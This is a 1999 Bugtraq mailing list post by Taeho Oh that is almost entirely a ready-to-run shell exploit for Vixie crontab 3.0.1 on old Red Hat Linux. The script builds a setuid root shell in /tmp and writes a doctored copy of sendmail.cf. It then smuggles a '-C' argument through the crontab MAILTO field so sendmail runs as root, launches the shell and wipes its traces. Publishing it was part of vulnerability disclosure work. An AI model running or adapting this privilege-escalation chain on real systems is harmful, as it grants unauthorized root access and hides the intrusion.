Bugtraq mailing list archives

Vixie Crontab exploit code

From: ohhara () OHHARA POSTECH AC KR (Taeho Oh)
Date: Thu, 2 Sep 1999 00:48:29 +0900


 Vixie Crontab exploit code

begin vixie-ex
----------------------------------------------------------------------
#!/bin/sh

# Vixie crontab exploit
#
# Local user can gain root access.
#
# Tested redhat linux : 4.2, 5.0, 5.1, 6.0
# Tested vixie crontab version : 3.0.1
#
# This program is only for demonstrative use only.
# USE IT AT YOUR OWN RISK!
#
# Programmed by Taeho Oh 1999/08/31
#
# Taeho Oh ( ohhara () postech edu )                   http://postech.edu/~ohhara
# PLUS ( Postech Laboratory for Unix Security )        http://postech.edu/plus
# PosLUG ( Postech Linux User Group )          http://postech.edu/group/poslug

PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
export PATH

echo
echo "Taeho Oh ( ohhara () postech edu )                   http://postech.edu/~ohhara";
echo "PLUS ( Postech Laboratory for Unix Security )        http://postech.edu/plus";
echo "PosLUG ( Postech Linux User Group )          http://postech.edu/group/poslug";
echo

echo make shell
echo
cat > /tmp/sh.c << EOF
#include<unistd.h>
#include<stdlib.h>
int main()
{
        setuid(0);
        setgid(0);
        execl("/bin/sh","sh",0);
        return 0;
}
EOF
echo compile shell
echo
cc -o /tmp/sh /tmp/sh.c || gcc -o /tmp/sh /tmp/sh.c

echo make execute shell script
echo
cat > /tmp/makesh << EOF
#!/bin/sh
chown root /tmp/sh
chgrp root /tmp/sh
chmod 4755 /tmp/sh
EOF
chmod 755 /tmp/makesh

echo hack sendmail.cf
echo
cp -f /etc/sendmail.cf /tmp/sendmail.cf.tmp1
sed 's/O DefaultUser=8:12/O DefaultUser=0:0/g' /tmp/sendmail.cf.tmp1 > /tmp/sendmail.cf
sed 's/P=\/usr\/bin\/procmail/P=\/tmp\/makesh/g' /tmp/sendmail.cf.tmp1 > /tmp/sendmail.cf.tmp2
sed 's/A=procmail/A=makesh/g' /tmp/sendmail.cf.tmp2 > /tmp/sendmail.cf.tmp3
cp /tmp/sendmail.cf.tmp3 /tmp/sendmail.cf
rm -f /tmp/sendmail.cf.tmp1
rm -f /tmp/sendmail.cf.tmp2
rm -f /tmp/sendmail.cf.tmp3

echo make cron file
echo
cat > /tmp/cronfile << EOF
MAILTO=-C/tmp/sendmail.cf `whoami`
* * * * * ls
EOF
echo input cron file
echo
crontab /tmp/cronfile

echo wait for 1 minute
echo
sec=`date +%S`
wait=`expr 65 - $sec`
sleep $wait

echo execute shell
echo
/tmp/sh

echo delete data files
echo
cd /tmp
rm -f sendmail.cf cronfile makesh sh.c
crontab /dev/null
----------------------------------------------------------------------
end vixie-ex

--

Taeho Oh ( ohhara () postech edu )                   http://postech.edu/~ohhara
PLUS ( Postech Laboratory for Unix Security )        http://postech.edu/plus
PosLUG ( Postech Linux User Group )          http://postech.edu/group/poslug

Current thread:

Re: Vixie Crontab exploit code Michal Zalewski (Jul 06)
- <Possible follow-ups>
- Vixie Crontab exploit code Taeho Oh (Sep 01)
  - Re: Vixie Crontab exploit code rjp () BROWSER ORG (Sep 06)